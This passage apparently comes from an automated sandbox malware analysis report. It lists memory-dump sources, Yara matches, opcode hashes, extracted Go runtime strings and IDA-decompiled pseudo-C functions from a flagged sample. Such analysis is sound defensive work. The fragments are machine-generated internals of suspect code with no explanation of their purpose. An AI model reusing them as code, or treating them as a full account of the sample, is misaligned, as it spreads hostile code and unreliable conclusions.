                                                                                                                            • -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = : status=Bassa_VahBhaiksukiCuneiformDiacriticFindClos, xrefs: 01309485
                                                                                                                            • packed= pointer stack=[ status AcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiopicExtenderGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaReadFileTagbanwaTai_ThamTai_VietTifinaghUgar, xrefs: 01309465
                                                                                                                            • lfstack.pushmadvdontneedmheapSpecialmspanSpecialnetapi32.dllnot pollableraceFiniLockreleasep: m=runtime: gp=runtime: sp=self-preemptshort bufferspanSetSpinesweepWaiterstraceStringswirep: p->m=worker mode != sweepgen MB globals, MB) workers= called from flu, xrefs: 013094AF
                                                                                                                            • cnt= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930AdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicSTermTakriTamil] = (arrayclosedeferfalsefaultgFreegcinggscanhchaninit int16int32int64mheapntohspanicscav , xrefs: 01309445
                                                                                                                            • runtime: lfstack.push invalid packing: node=cannot send after transport endpoint shutdownexitsyscall: syscall frame is no longer validheapBitsSetType: called with non-pointer typereflect: internal error: invalid method indexruntime.minit: duplicatehandle faile, xrefs: 01309427
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = : status=Bassa_VahBhaiksukiCuneiformDiacriticFindClos$ cnt= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930AdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicSTermTakriTamil] = (arrayclosedeferfalsefaultgFreegcinggscanhchaninit int16int32int64mheapntohspanicscav $ packed= pointer stack=[ status AcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiopicExtenderGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaReadFileTagbanwaTai_ThamTai_VietTifinaghUgar$lfstack.pushmadvdontneedmheapSpecialmspanSpecialnetapi32.dllnot pollableraceFiniLockreleasep: m=runtime: gp=runtime: sp=self-preemptshort bufferspanSetSpinesweepWaiterstraceStringswirep: p->m=worker mode != sweepgen MB globals, MB) workers= called from flu$runtime: lfstack.push invalid packing: node=cannot send after transport endpoint shutdownexitsyscall: syscall frame is no longer validheapBitsSetType: called with non-pointer typereflect: internal error: invalid method indexruntime.minit: duplicatehandle faile
                                                                                                                            • API String ID: 0-3705293079
                                                                                                                            • Opcode ID: bd4b789676844565f11f49df1f25230df2f44fbc3c2e3844125b0c83801ba6c3
                                                                                                                            • Instruction ID: 2dbc0e78e183757777d59a57b90ed968e23598175c09fa6fa82146770f378082
                                                                                                                            • Opcode Fuzzy Hash: bd4b789676844565f11f49df1f25230df2f44fbc3c2e3844125b0c83801ba6c3
                                                                                                                            • Instruction Fuzzy Hash: 7E315E32214B85C6DB14EF55F89039EB768F799788F885421EE8D07B65CF38C155C714
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 77%
                                                                                                                            			E01329D80(unsigned int __ecx, intOrPtr __edx, long long __rax, void* __rsi, long long __rbp, void* __r14, long long _a8) {
                                                                                                                            				char _v8;
                                                                                                                            				unsigned long long _v16;
                                                                                                                            				signed long long _v24;
                                                                                                                            				void* _t24;
                                                                                                                            				void* _t48;
                                                                                                                            				void* _t49;
                                                                                                                            				void* _t50;
                                                                                                                            				signed int _t68;
                                                                                                                            				unsigned long long _t69;
                                                                                                                            				signed long long _t70;
                                                                                                                            				unsigned long long _t74;
                                                                                                                            				void* _t79;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t82 = __r14;
                                                                                                                            					_t77 = __rbp;
                                                                                                                            					_t59 = __rax;
                                                                                                                            					_t46 = __edx;
                                                                                                                            					_t41 = __ecx;
                                                                                                                            					if(_t79 <=  *((intOrPtr*)(__r14 + 0x10))) {
                                                                                                                            						goto L11;
                                                                                                                            					}
                                                                                                                            					L1:
                                                                                                                            					_v8 = __rbp;
                                                                                                                            					_t77 =  &_v8;
                                                                                                                            					_t69 =  *((intOrPtr*)(__rax + 0x20));
                                                                                                                            					_t74 = _t69;
                                                                                                                            					_t70 = _t69 >> 0x20;
                                                                                                                            					if(__edx > __ecx) {
                                                                                                                            						L10:
                                                                                                                            						_v16 = _t74;
                                                                                                                            						_v24 = _t70;
                                                                                                                            						E01332340(_t74, _t77, _t82);
                                                                                                                            						E01332C40(_t41, _t48, _t49, _t50, 0x1386ee7, _t68, _t77, _t82);
                                                                                                                            						E01332940(_t48, _t49, _t50, _v24, _t70, _t77, _t82);
                                                                                                                            						E01332C40(_t41, _t48, _t49, _t50, 0x138726c, _t68, _t77, _t82);
                                                                                                                            						E01332940(_t48, _t49, _t50, _v16, _t70, _t77, _t82);
                                                                                                                            						E013325A0(_t41, _t46, _t48, _t49, _t50, _t77, _t82);
                                                                                                                            						L013323C0(_t74, _t77, _t82);
                                                                                                                            						_t59 = 0x138cde8;
                                                                                                                            						E01330BA0(0x138cde8, _t68, _t77);
                                                                                                                            						goto L11;
                                                                                                                            					}
                                                                                                                            					L2:
                                                                                                                            					_t41 = __ecx >> 9;
                                                                                                                            					if( *((intOrPtr*)(__rax + 0x10)) > _t70) {
                                                                                                                            						L3:
                                                                                                                            						_t70 = (_t70 << 3) +  *((intOrPtr*)(__rax + 8));
                                                                                                                            						_t68 =  *_t70;
                                                                                                                            						if(_t68 != 0) {
                                                                                                                            							L4:
                                                                                                                            							_t46 =  *((intOrPtr*)(_t68 + 0x10));
                                                                                                                            							if(_t46 == 0) {
                                                                                                                            								L9:
                                                                                                                            								E01330BA0(0x138ea71, _t68, _t77);
                                                                                                                            								goto L10;
                                                                                                                            							} else {
                                                                                                                            								L5:
                                                                                                                            								if(_t46 == 0x200) {
                                                                                                                            									L8:
                                                                                                                            									E01330BA0(0x138e652, _t68,  &_v8);
                                                                                                                            									goto L9;
                                                                                                                            								} else {
                                                                                                                            									L6:
                                                                                                                            									_a8 = __rax;
                                                                                                                            									 *_t70 = _t74;
                                                                                                                            									 *((intOrPtr*)(_t68 + 0x10)) = 0;
                                                                                                                            									_t24 = E013093A0( *((intOrPtr*)(_t68 + 0x10)), _t68,  &_v8, __r14);
                                                                                                                            									_t59 = _a8;
                                                                                                                            								}
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					L7:
                                                                                                                            					_t13 = _t59 + 0x20;
                                                                                                                            					 *_t13 = _t70;
                                                                                                                            					 *((intOrPtr*)(_t59 + 0x10)) =  *_t13;
                                                                                                                            					return _t24;
                                                                                                                            					L12:
                                                                                                                            					L11:
                                                                                                                            					_a8 = _t59;
                                                                                                                            					E01356200(_t74, _t77);
                                                                                                                            				}
                                                                                                                            			}
















                                                                                                                            Strings
                                                                                                                            • , tail = : status=Bassa_VahBhaiksukiCuneiformDiacriticFindCloseHex_DigitInheritedKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanPGDGBKWRPPalmyreneSamaritanSundaneseWSASendToWriteFileatomicor8bad prunechan sendcomplex64copystackctxt != 0debugLockhchanLea, xrefs: 01329E58
                                                                                                                            • fully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characterpanicwrap: unexpected string after package name: runtime: unexpected waitm - semaphore out of syncs.allocCount !=, xrefs: 01329E0C
                                                                                                                            • head = invalidminpc= pacer: panic: runningsyscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status AcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiop, xrefs: 01329E3D
                                                                                                                            • span set block with unpopped elements found in resetcompileCallback: argument size is larger than uintptrgoroutine running on other thread; stack unavailablegcControllerState.findRunnable: blackening not enabledno goroutines (main called runtime.Goexit) - de, xrefs: 01329E1D
                                                                                                                            • attempt to clear non-empty span setfile type does not support deadlinefindrunnable: netpoll with spinninggreyobject: obj not pointer-alignedmheap.freeSpanLocked - invalid freemismatched begin/end of activeSweepnetwork dropped connection on resetpersistentalloc, xrefs: 01329E7F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: , tail = : status=Bassa_VahBhaiksukiCuneiformDiacriticFindCloseHex_DigitInheritedKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanPGDGBKWRPPalmyreneSamaritanSundaneseWSASendToWriteFileatomicor8bad prunechan sendcomplex64copystackctxt != 0debugLockhchanLea$attempt to clear non-empty span setfile type does not support deadlinefindrunnable: netpoll with spinninggreyobject: obj not pointer-alignedmheap.freeSpanLocked - invalid freemismatched begin/end of activeSweepnetwork dropped connection on resetpersistentalloc$fully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characterpanicwrap: unexpected string after package name: runtime: unexpected waitm - semaphore out of syncs.allocCount !=$head = invalidminpc= pacer: panic: runningsyscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status AcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiop$span set block with unpopped elements found in resetcompileCallback: argument size is larger than uintptrgoroutine running on other thread; stack unavailablegcControllerState.findRunnable: blackening not enabledno goroutines (main called runtime.Goexit) - de
                                                                                                                            • API String ID: 0-3357717887
                                                                                                                            • Opcode ID: aed5e41c494874cab476ea500c6f5ff176b03d1f7cfddd5187176bf9ae1dedb5
                                                                                                                            • Instruction ID: ea95aa95826988c7484917422e89288f11be5cb821758bee860273aff019c6d6
                                                                                                                            • Opcode Fuzzy Hash: aed5e41c494874cab476ea500c6f5ff176b03d1f7cfddd5187176bf9ae1dedb5
                                                                                                                            • Instruction Fuzzy Hash: 6A21DC32704B5286EB19EB68E49039E6768F7E874CF40882ADE8D03724DF3CC250C754
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno_fileno_flush_getptd_noexit_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 634798775-0
                                                                                                                            • Opcode ID: 7bce626d7afc9819c7f1e58d7e894cd5191f436782fc08b52c428c94075eafe2
                                                                                                                            • Instruction ID: aa0f7e1137d8614f9cf7eb1754606820eec2a7cbd6c2c23a815fdbb993728ff8
                                                                                                                            • Opcode Fuzzy Hash: 7bce626d7afc9819c7f1e58d7e894cd5191f436782fc08b52c428c94075eafe2
                                                                                                                            • Instruction Fuzzy Hash: 0C51D832208F194AEF6A5A6D5C4D33971C1E75A321F34022DF45AC39F2EB72DC534599
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: clock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3195780754-0
                                                                                                                            • Opcode ID: d7a4d761e54538920b4b935b993e67a53848bc2dc46ab41d145f102206191f98
                                                                                                                            • Instruction ID: 7de45547bb9cd632c67bd357052b7dc8b1ca29300949d81c6e29260c270d32a5
                                                                                                                            • Opcode Fuzzy Hash: d7a4d761e54538920b4b935b993e67a53848bc2dc46ab41d145f102206191f98
                                                                                                                            • Instruction Fuzzy Hash: 5721C97340CB080AEF65AD986C4A266B6D0E755365F25022DF986C3652F6609C4282E9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4151157258-0
                                                                                                                            • Opcode ID: 5705c219c9d75adeb5e274b84b5cdd4a7d2fb13a0f2fa6746f6d221e16d3604e
                                                                                                                            • Instruction ID: 5710f91ec1629663358fd23307a41bbdec5aef1ad73c20bc3f36f62fd9592a09
                                                                                                                            • Opcode Fuzzy Hash: 5705c219c9d75adeb5e274b84b5cdd4a7d2fb13a0f2fa6746f6d221e16d3604e
                                                                                                                            • Instruction Fuzzy Hash: 56216A2361CE644EEFA297184C8D33936D2E749333F240559F096C38C1E778D841C2A9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 82%
                                                                                                                            			E0000025B25BF8A893B8(void* __edx, void* __eflags, signed char* __rax, long long __rbx, void* __rcx, long long __rsi, void* __r8, long long _a8, long long _a16) {
                                                                                                                            				intOrPtr _v16;
                                                                                                                            				intOrPtr _v24;
                                                                                                                            				intOrPtr _v32;
                                                                                                                            				char _v40;
                                                                                                                            				void* _t17;
                                                                                                                            				signed int _t23;
                                                                                                                            				signed short _t24;
                                                                                                                            				signed short _t27;
                                                                                                                            				void* _t30;
                                                                                                                            				signed char* _t43;
                                                                                                                            				signed char* _t47;
                                                                                                                            				signed char* _t48;
                                                                                                                            				intOrPtr _t58;
                                                                                                                            				char* _t59;
                                                                                                                            
                                                                                                                            				_t43 = __rax;
                                                                                                                            				r8d = 0;
                                                                                                                            				goto 0xf8a893c0;
                                                                                                                            				_a8 = __rbx;
                                                                                                                            				_a16 = __rsi;
                                                                                                                            				_t30 = __edx;
                                                                                                                            				_t3 =  &_v40; // 0xd
                                                                                                                            				E0000025B25BF8A7C0AC(__rax, _t3, __r8);
                                                                                                                            				if (__rcx != 0) goto 0xf8a893fa;
                                                                                                                            				_t17 = E0000025B25BF8A7B89C(_t43);
                                                                                                                            				 *_t43 = 0x16;
                                                                                                                            				E0000025B25BF8A7BEC4(_t17);
                                                                                                                            				goto 0xf8a89454;
                                                                                                                            				_t58 = _v32;
                                                                                                                            				if ( *((intOrPtr*)(_t58 + 8)) != 0) goto 0xf8a89413;
                                                                                                                            				strchr(_t59);
                                                                                                                            				_t47 = _t43;
                                                                                                                            				goto 0xf8a89457;
                                                                                                                            				_t24 =  *_t47 & 0x000000ff;
                                                                                                                            				if (_t24 == 0) goto 0xf8a8944d;
                                                                                                                            				if ((_t43[_t58 + 0x19] & 0x00000004) == 0) goto 0xf8a89441;
                                                                                                                            				_t48 =  &(_t47[1]);
                                                                                                                            				if ( *_t48 == sil) goto 0xf8a89454;
                                                                                                                            				_t27 = (_t24 & 0x0000ffff) << 0x00000008 |  *_t48 & 0x000000ff;
                                                                                                                            				if (_t30 != _t27) goto 0xf8a89448;
                                                                                                                            				goto 0xf8a89457;
                                                                                                                            				if (_t30 == (_t27 & 0x0000ffff)) goto 0xf8a8944d;
                                                                                                                            				goto 0xf8a89413;
                                                                                                                            				_t23 = _t27 & 0x0000ffff;
                                                                                                                            				if (_t30 == _t23) goto 0xf8a89457;
                                                                                                                            				if (_v16 == sil) goto 0xf8a8946a;
                                                                                                                            				 *(_v24 + 0xc8) =  *(_v24 + 0xc8) & 0xfffffffd;
                                                                                                                            				return _t23;
                                                                                                                            			}


















                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4151157258-0
                                                                                                                            • Opcode ID: 1372c0821d97a5e4a86b9bb15949324630c8f3187dca1cf9f881e1ac9ae961b3
                                                                                                                            • Instruction ID: f7c192731604a4fb5a86c80c6273a613a26cdb39be95ccec047174b2611e7dea
                                                                                                                            • Opcode Fuzzy Hash: 1372c0821d97a5e4a86b9bb15949324630c8f3187dca1cf9f881e1ac9ae961b3
                                                                                                                            • Instruction Fuzzy Hash: 9B21AE63628AA081FF625611BC5C37DA690E380BF7F3C4125FA9B0AEC5DB38C4419738
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: clock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3195780754-0
                                                                                                                            • Opcode ID: d7a4d761e54538920b4b935b993e67a53848bc2dc46ab41d145f102206191f98
                                                                                                                            • Instruction ID: a6e87d32126a06bad382556f4b0a3346622f23a498fdb4610ab6a77b13ecddbd
                                                                                                                            • Opcode Fuzzy Hash: d7a4d761e54538920b4b935b993e67a53848bc2dc46ab41d145f102206191f98
                                                                                                                            • Instruction Fuzzy Hash: F311E723204B4445FF729E667C4462BF690F7443B1F39B425FE5523A89EB74C8D1C664
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 67%
                                                                                                                            			E0000025B25BF8A6FC8C(void* __rax, long long __rbx, void* __rcx, long long __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                                                                            				long long _v24;
                                                                                                                            				void* __rdi;
                                                                                                                            				int _t17;
                                                                                                                            				void* _t18;
                                                                                                                            				void* _t21;
                                                                                                                            				void* _t23;
                                                                                                                            				void* _t29;
                                                                                                                            				void* _t31;
                                                                                                                            				void* _t32;
                                                                                                                            				long long _t40;
                                                                                                                            				long long _t48;
                                                                                                                            				void* _t51;
                                                                                                                            				long long _t53;
                                                                                                                            				void* _t54;
                                                                                                                            				long long _t58;
                                                                                                                            				void* _t69;
                                                                                                                            				void* _t70;
                                                                                                                            
                                                                                                                            				_t48 = __rdx;
                                                                                                                            				_t37 = __rax;
                                                                                                                            				_a8 = __rbx;
                                                                                                                            				_a16 = __rbp;
                                                                                                                            				_a24 = __rsi;
                                                                                                                            				malloc(??);
                                                                                                                            				_v24 = __rdx;
                                                                                                                            				E0000025B25BF8A794CC(_t23, 0x4000, __rax, __rax, __rdx, 0xf8a8bb18, __rcx);
                                                                                                                            				if (r8d == 0) goto 0xf8a6fce0;
                                                                                                                            				remove(??);
                                                                                                                            				goto 0xf8a6fce5;
                                                                                                                            				_t17 = remove(??);
                                                                                                                            				_t40 = _a8;
                                                                                                                            				_t58 = _a16;
                                                                                                                            				_t53 = _a24;
                                                                                                                            				_pop(_t51);
                                                                                                                            				goto E0000025B25BF8A790D8;
                                                                                                                            				asm("int3");
                                                                                                                            				asm("int3");
                                                                                                                            				asm("int3");
                                                                                                                            				_a8 = _t40;
                                                                                                                            				_a16 = _t58;
                                                                                                                            				_a24 = _t53;
                                                                                                                            				_push(_t51);
                                                                                                                            				_t29 = r8d;
                                                                                                                            				r8d = 0;
                                                                                                                            				_t54 = __rax;
                                                                                                                            				_t18 = E0000025B25BF8A8B518(_t17, 0x4000, 0, _t29, _t31, __rax, _t40, __rax, _t48, _t51, __rax, _t69, _t70);
                                                                                                                            				if (_t18 != 0) goto 0xf8a6fd36;
                                                                                                                            				goto 0xf8a6fd58;
                                                                                                                            				if (1 - _t29 >= 0) goto 0xf8a6fd32;
                                                                                                                            				_t21 = E0000025B25BF8A793C0(0x4000, 0, _t29, _t32, _t48, _t48, _t51);
                                                                                                                            				r8d = _t18;
                                                                                                                            				return E0000025B25BF8A8B518(_t21, 0x4000, 0, _t29, _t31, _t37, _t40, _t54, _t48, _t51, _t54, _t69, _t70);
                                                                                                                            			}





















                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$remove$__copy_path_to_wide_string_callnewh_invalid_parameter_noinfo_snprintfmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1078080488-0
                                                                                                                            • Opcode ID: 548fe609cd5e3755ebec080ec3bcac8cd848b7821eed1c8d262471da4c3b07b6
                                                                                                                            • Instruction ID: 6598548145cf1076dea0629ff0572a787ade2c99cd705cda682226b5570b5f5f
                                                                                                                            • Opcode Fuzzy Hash: 548fe609cd5e3755ebec080ec3bcac8cd848b7821eed1c8d262471da4c3b07b6
                                                                                                                            • Instruction Fuzzy Hash: B1F09063604E8185EA119B12BC1939EA220E784BE1F684421BF8917F9ACF3CC41187A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritable
                                                                                                                            • String ID: $csm
                                                                                                                            • API String ID: 3104724169-717980254
                                                                                                                            • Opcode ID: 6fd12170077310210e4a067a79524cced3896a0abe59c1130f854dc253b70f79
                                                                                                                            • Instruction ID: 69c74cf1e050ed5c79b8e0845b03ea2dd260b7ef642e91eaaaa557286a9e6d57
                                                                                                                            • Opcode Fuzzy Hash: 6fd12170077310210e4a067a79524cced3896a0abe59c1130f854dc253b70f79
                                                                                                                            • Instruction Fuzzy Hash: C261C432608E088FEF19AF1CDC8972877D1EB55325F64406DF84ADB6A2DB30D852C759
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 57%
                                                                                                                            			E0000025B25BF8A883B0(void* __edi, void* __esp, void* __rax, void* __rbx, void* __rdx, void* __rsi, void* __rbp, void* __r8, void* __r10, void* __r11, void* __r12, intOrPtr _a12, char _a44, signed int _a4368, signed long long _a4372, long long _a4388, signed int _a4396) {
                                                                                                                            				void* __rdi;
                                                                                                                            				void* _t117;
                                                                                                                            				void* _t119;
                                                                                                                            				signed long long _t130;
                                                                                                                            				signed long long _t144;
                                                                                                                            				signed long long _t146;
                                                                                                                            				signed long long _t148;
                                                                                                                            				signed long long _t150;
                                                                                                                            				void* _t187;
                                                                                                                            				signed long long _t188;
                                                                                                                            
                                                                                                                            				E0000025B25BF8A7A9C0(0x1150, __rax, __r10, __r11);
                                                                                                                            				_t188 = _t187 - __rax;
                                                                                                                            				memset(__edi, 0xcccccccc, 0x454 << 2);
                                                                                                                            				_t119 = __esp + 0xc;
                                                                                                                            				_t117 = __edi + 0x454;
                                                                                                                            				_t130 =  *0xf8a9c990; // 0x18002eb3c
                                                                                                                            				_a4396 = _t130 ^ _t188;
                                                                                                                            				_a4368 = 0;
                                                                                                                            				_a4368 = _a4368 + 1;
                                                                                                                            				if (_a4368 - 3 >= 0) goto 0xf8a886b3;
                                                                                                                            				E0000025B25BF8A634DC(__rdx);
                                                                                                                            				_a4388 =  &M0000025B25BF8A967D0 + 4 + _a4368 * 0x44;
                                                                                                                            				r8d = 0;
                                                                                                                            				_a12 = E0000025B25BF8A86190( *((intOrPtr*)( &M0000025B25BF8A967D0 + _a4368 * 0x44)), _t117, _t119, _a4388, _a4388,  &_a44);
                                                                                                                            				if (_a12 == 0) goto 0xf8a8847c;
                                                                                                                            				goto 0xf8a886b5;
                                                                                                                            				E0000025B25BF8A87060(_t117, _t119,  &M0000025B25BF8A967D0 + 0x24 + _a4368 * 0x44, _t188 + 0x10f8 + _t134 * 0,  &_a44);
                                                                                                                            				E0000025B25BF8A879D0(_t117, _t119, _t188 + 0x10f8 + ( &M0000025B25BF8A967D0 + 0x24 + _a4368 * 0x44) * 0, _t188 + _t188 + 0x10f8 + _t134 * 0 + 0x10f8,  &_a44);
                                                                                                                            				r8d = 0x10;
                                                                                                                            				if (E0000025B25BF8A85160(0x10, _t188 + 0x10f8 +  &M0000025B25BF8A967D0 * 0,  &M0000025B25BF8A967D0 + 0x34 + _a4368 * 0x44,  &_a44) != 0) goto 0xf8a88557;
                                                                                                                            				_t144 =  &M0000025B25BF8A967D0 + 0x24 + _a4368 * 0x44;
                                                                                                                            				r8d = 0x10;
                                                                                                                            				if (E0000025B25BF8A85160(0x10, _t188 +  &M0000025B25BF8A967D0 + 0x10f8, _t144,  &_a44) == 0) goto 0xf8a88561;
                                                                                                                            				goto 0xf8a886b5;
                                                                                                                            				_a4372 = 0;
                                                                                                                            				goto 0xf8a8857e;
                                                                                                                            				_a4372 = _a4372 + 1;
                                                                                                                            				if (_a4372 - 0x10 >= 0) goto 0xf8a885a7;
                                                                                                                            				_t146 = _t188 + 0x10f8 + _t144 * 0;
                                                                                                                            				_t168 = _a4372;
                                                                                                                            				 *((char*)(_t146 + _a4372)) = 0;
                                                                                                                            				goto 0xf8a8856e;
                                                                                                                            				_a4372 = 0;
                                                                                                                            				goto 0xf8a885c4;
                                                                                                                            				_a4372 = _a4372 + 1;
                                                                                                                            				if (_a4372 - 0x3e8 >= 0) goto 0xf8a88602;
                                                                                                                            				_t148 = _t188 + 0x10f8 + _t146 * 0;
                                                                                                                            				E0000025B25BF8A87060(_t117, _t119, _t188 + 0x10f8 + _t168 * 0, _t148,  &_a44);
                                                                                                                            				goto 0xf8a885b4;
                                                                                                                            				_a4372 = 0;
                                                                                                                            				goto 0xf8a8861f;
